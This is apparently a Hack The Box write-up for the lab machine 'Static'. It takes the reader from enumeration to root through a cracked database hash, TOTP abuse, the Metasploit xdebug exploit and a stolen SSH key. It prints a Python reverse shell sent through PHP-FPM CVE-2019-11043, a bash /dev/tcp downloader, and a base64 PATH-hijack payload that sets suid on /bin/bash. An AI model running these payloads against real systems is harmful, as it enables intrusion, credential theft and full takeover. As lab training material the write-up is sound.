Hack_The_Box_Writeups

HackTheBox – Static Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.10.246

http://10.10.10.246:8080/

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster dir -u http://10.10.10.246:8080/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x .php,txt

http://10.10.10.246:8080/robots.txt

http://10.10.10.246:8080/vpn/

http://10.10.10.246:8080/.ftp_uploads/

http://10.10.10.246:8080/.ftp_uploads/warning.txt

┌──(rootkali)-[/home/kali/Downloads]

└─# apt-get install g++

After some google i found a tool for fix the corrupted gz files.

┌──(rootkali)-[/home/kali/Downloads]

└─# git clone https://github.com/yonjar/fixgz.git

┌──(rootkali)-[/home/kali/Downloads]

└─# cd fixgz/

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# ls -la 

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# g++ fixgz.cpp -o fixgz

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# ls   

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# ./fixgz /home/kali/Downloads/db.sql.gz db.gz

──(rootkali)-[/home/kali/Downloads/fixgz]

└─# gunzip db.gz

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# ls –la

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# cat db

Found username(admin) and hash(d033e22ae348aeb5660fc2140aec35850c4da997) and a totp(orxxi4c7orxwwzlo)

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# cat hash 

┌──(rootkali)-[/home/kali/Downloads/fixgz]

└─# john hash

http://10.10.10.246:8080/vpn/login.php

username: admin

password: admin

But the good news is we have the secret totp(orxxi4c7orxwwzlo)

──(rootkali)-[/home/kali/Downloads]

└─# curl -I http://10.10.10.246:8080

┌──(rootkali)-[/home/kali/Downloads]

└─# date -s “17 Dec 2021 06:52:44” 

┌──(rootkali)-[/home/kali/Downloads]

└─# timedatectl set-time “08:20:43”

https://totp.app/

Use the token and we are in

Common name: web

Click on generate

┌──(rootkali)-[/home/kali/Downloads]

└─# ls -lrt | grep web.ovpn

┌──(rootkali)-[/home/kali/Downloads]

└─# openvpn web.ovpn

┌──(rootkali)-[/home/kali/Downloads]

└─# cat web.ovpn

┌──(rootkali)-[/home/kali/Downloads]

└─# cat /etc/hosts | grep 10.10.10.246

┌──(rootkali)-[/home/kali/Downloads]

└─# openvpn web.ovpn

Now let’s go to this web ip.

But it’s loading and we can’t see the web page.

We see in the image that we have two interface first tun0 second tun9 but in tun9 we have the ip 172.30.0.9 and the web page we want to access that’s ip is 172.20.0.10.

┌──(rootkali)-[/home/kali/Downloads]

└─# ifconfig

So we want to add the route for access the web page in tun9 interface.

┌──(rootkali)-[/home/kali/Downloads]

└─# ip route add 172.20.0.0/24 dev tun9

And now we can access the web page.

Let’s go to info.php

http://172.20.0.10/

http://172.20.0.10/info.php

Found the xdebug let’s check the exploit for that.

https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/

msf6 > use exploit/unix/http/xdebug_unauth_exec

msf6 exploit(unix/http/xdebug_unauth_exec) > set PATH /vpn/login.php

msf6 exploit(unix/http/xdebug_unauth_exec) > set RHOSTS 172.20.0.10

msf6 exploit(unix/http/xdebug_unauth_exec) > set LHOST tun9

msf6 exploit(unix/http/xdebug_unauth_exec) > set LPORT 9001

msf6 exploit(unix/http/xdebug_unauth_exec) > options

Now let’s run the exploit.

Boom we got the shell.

msf6 exploit(unix/http/xdebug_unauth_exec) > run

meterpreter > shell

Pwd

cd /home/www-data/.ssh

ls –al

cat id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# chmod 600 id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i id_rsa www-data@10.10.10.246

Let’s try with custom port of ssh 2222 which we see inside nmap scan.

And we got the user.txt

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i id_rsa www-data@10.10.10.246 -p 2222   

www-data@web:~$ cd /home

www-data@web:/home$ ls –lrt

www-data@web:/home$ cat user.txt

Privilege escalation

If you see on the Support Portal we have another network of ip(192.168.254.3).

www-data@web:/home$ ifconfig

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -L 80:192.168.254.3:80 www-data@10.10.10.246 -p2222 -i id_rsa

Now let’s go to localhost or 127.0.0.1 and we got the page.

There is nothing on the website just saying batch mode: /usr/bin/ersatool...

http://localhost/

And if we check the header we see PHP-FPM/7.1 is running let’s check the exploit for that.

https://medium.com/@knownsec404team/php-fpm-remote-code-execution-vulnerability-cve-2019-11043-analysis-35fd605dd2dc

https://github.com/theMiddleBlue/CVE-2019-11043

After reading the article i understand that how to exploit this and get rev shell

┌──(rootkali)-[/home/kali/Downloads]

└─# git clone https://github.com/theMiddleBlue/CVE-2019-11043.git

┌──(rootkali)-[/home/kali/Downloads]

└─# mv CVE-2019-11043/exploit.py .

┌──(rootkali)-[/home/kali/Downloads]

└─# rm -rf CVE-2019-11043/

┌──(rootkali)-[/home/kali/Downloads]

└─# ls -al | grep exploit.py

┌──(rootkali)-[/home/kali/Downloads]

└─# cat dedsec.py

CODE:

import requests

payload = ‘/usr/bin/python3.6 -c \’import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.254.2”,9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)\”

r = requests.get(“http://192.168.254.3/index.php?a=”+payload)

print(r.text)

https://github.com/H74N/netcat-binaries/blob/master/nc

┌──(rootkali)-[/home/kali/Downloads]

└─# scp -P 2222 -i id_rsa nc www-data@10.10.10.246:/tmp/nc

┌──(rootkali)-[/home/kali/Downloads]

└─# scp -P 2222 -i id_rsa exploit.py www-data@10.10.10.246:/tmp/exploit.py

┌──(rootkali)-[/home/kali/Downloads]

└─# scp -P 2222 -i id_rsa dedsec.py www-data@10.10.10.246:/tmp/dedsec.py

www-data@web:~$ cd /tmp

www-data@web:/tmp$ ls –lrt

www-data@web:/tmp$ chmod +x nc

www-data@web:/tmp$ ./nc -nlvp 9001

On another terminal

www-data@web:/home$ cd /tmp

www-data@web:/tmp$ python3 exploit.py –url http://192.168.254.3/index.php

www-data@web:/tmp$ python3 dedsec.py

On listener

www-data@pki:~/html$ id

www-data@pki:~/html$ pwd

www-data@pki:~/html$ ls

Now if you remember we see a file called ersatool on web page. Let’s check that file.

After checking that file i known that it’s a binary which running as root.

www-data@pki:~/html$ ls -al  /usr/bin/ersatool

www-data@pki:~/html$ file /usr/bin/ersatool

And after some enumeration i found the source code that file.

www-data@pki:~/html$ cd /usr/bin

www-data@pki:/usr/bin$ find / -name ersatool.* 2>/dev/null

www-data@pki:/usr/bin$ cat /usr/src/ersatool.c

So we have two methods for geting root
1. using format string vulnerability
2. path injection
So i use path injection for doing that.

So let’s monitor the calls of binary with pspy but the problem is how do we transfer that pspy binary on that machine because there is no curl and wget or nothing for that.

But i found a way to transfer pspy into machine by help of this article.

Link : how to download a file using just bash and nothing else

With the help of this bash script i will transfer that pspy binary.

https://unix.stackexchange.com/questions/83926/how-to-download-a-file-using-just-bash-and-nothing-else-no-curl-wget-perl-et

https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

┌──(rootkali)-[/home/kali/Downloads]

└─# scp -P 2222 -i id_rsa pspy64s www-data@10.10.10.246:/tmp/pspy

www-data@web:/tmp$ ls -lrt

www-data@web:/tmp$ python3 -m http.server 1337

Follow the steps again to get the second shell with dedsec.py because we want two shells first is for running pspy second is for running ersatool binary.

After everything ready go to the shell which we get from dedsec.py and paste the whole script on terminal.1. go to /tmp directory
2. create a directory www
3. paste the whole code which we get from StackOverflow

4. then call the function with __curl
5. and download the file inside /tmp/www directory

www-data@pki:/usr/bin$ cd /tmp

www-data@pki:/tmp$ mkdir www

www-data@pki:/tmp$ cd www

But i found a way to transfer pspy into machine by help of this article.

how to download a file using just bash and nothing else (no curl, wget, perl, etc.)

Link : https://unix.stackexchange.com/questions/83926/how-to-download-a-file-using-just-bash-and-nothing-else-no-curl-wget-perl-et

With the help of this bash script i will transfer that pspy binary.

www-data@pki:/tmp/www$ function __curl() {

>   read proto server path <<<$(echo ${1//// })

>   DOC=/${path// //}

>   HOST=${server//:*}

>   PORT=${server//*:}

>   [[ x”${HOST}” == x”${PORT}” ]] && PORT=80

>

>   exec 3<>/dev/tcp/${HOST}/$PORT

>   echo -en “GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n” >&3

>   (while read line; do

>    [[ “$line” == $’\r’ ]] && break

>   done && cat) <&3

>   exec 3>&-

> }

www-data@pki:/tmp/www$ __curl http://192.168.254.2:1337/pspy > pspy

Now after transferring pspy run that on first rev shell.

www-data@pki:/tmp/www$ chmod +x pspy

www-data@pki:/tmp/www$  ./pspy | tee log &

/usr/bin/ersatool

create

a

print

a

b

exit

And i capture all calls of the binary and i found that openssl was call without giving the full path.

┌──(rootkali)-[/home/kali/Downloads]

└─# cat openssl 

┌──(rootkali)-[/home/kali/Downloads]

└─# cat openssl | base64

www-data@pki:~/html$ cd /tmp

www-data@pki:/tmp$ mkdir pwn

www-data@pki:/tmp$ cd pwn

www-data@pki:/tmp/pwn$ echo “IyEvYmluL2Jhc2gKY2htb2QgdStzIC9iaW4vYmFzaAo=” | base64 -d > openssl

www-data@pki:/tmp/pwn$ cat openssl

www-data@pki:/tmp/pwn$ chmod 755 openssl

www-data@pki:/tmp/pwn$ ls –al

www-data@pki:/tmp/pwn$ export PATH=/tmp/pwn:$PATH

www-data@pki:/tmp/pwn$ echo $PATH

www-data@pki:/tmp/pwn$ ersatool

www-data@pki:/tmp/pwn$ ls -al /bin/bash

www-data@pki:/tmp/pwn$ /bin/bash -p

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *